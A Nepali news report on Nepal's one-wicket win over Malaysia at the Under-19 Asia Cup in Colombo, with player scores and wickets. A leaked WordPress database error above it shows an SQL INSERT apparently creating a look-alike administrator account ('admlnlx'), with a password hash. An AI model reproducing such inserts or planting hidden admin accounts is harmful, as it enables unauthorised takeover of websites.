WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQrpOjwm9Low1R5O262CXdqF.zqhAR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 17:44:51', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ३-
श्रीलंकामा जारी यु १९ एसिया कप क्रिकेटमा नेपालले मलेसियालाई हराउँदै प्रतियोगिताको सुखद अन्त्य गरेको छ।आइतबार कोलम्बोमा भएको समूह चरणबाटै बाहिरिएको नेपालले अर्को बाहिरिएको मुलुक मलेसियालाई १ विकेटले हराउँदै प्रतियोगितामा पहिलो जीत दर्ता गरेको हो।
टस जितेर मलेसियालाई पहिले ब्याटिङको निम्तो दिएको नेपालले मलेसियाबाट १५४ रनको मध्यम लक्ष्य पाएको थियो।मलेसियाका लागि कप्तान विरनदिप सिंहले सर्वाधिक ७५ रन बनाएका थिए। मलेसियालाई मध्यम स्कोरमा रोक्न नेपालका आदिल खानले ३ तथा सन्दिप लामिछानेले २ र दीपेन्द्रसिंह ऐरीले २-२ विकेट लिए। रोहितकुमार पौडेल, शुभंकर उराउ र पवन सरार्फले १-१ विकेट लिए।
१५४ रनको विजयी लक्ष्य लिएर मैदानमा आएको नेपालले निर्धारित ५० ओभरको खेलमा ४४.४ ओभर खेल्दै ९ विकेट गुमाएर विजयी भयो। नेपालको जितका लागि अनिल शाहले ३२, अभिनाश कर्णले २९, दीपेन्द्रसिंह ऐरीले २२ रन बनाए।
यस्तै भारतविरूद्ध आक्रमक प्रदर्शन गरेका रोहितकुमार पौडेल १२ रनमा आउट भए।मलेसियाका विरनदिप सिंहले ३ तथा मोहम्मद हाफिज र सेयद आजिदले २-२ विकेट लिए।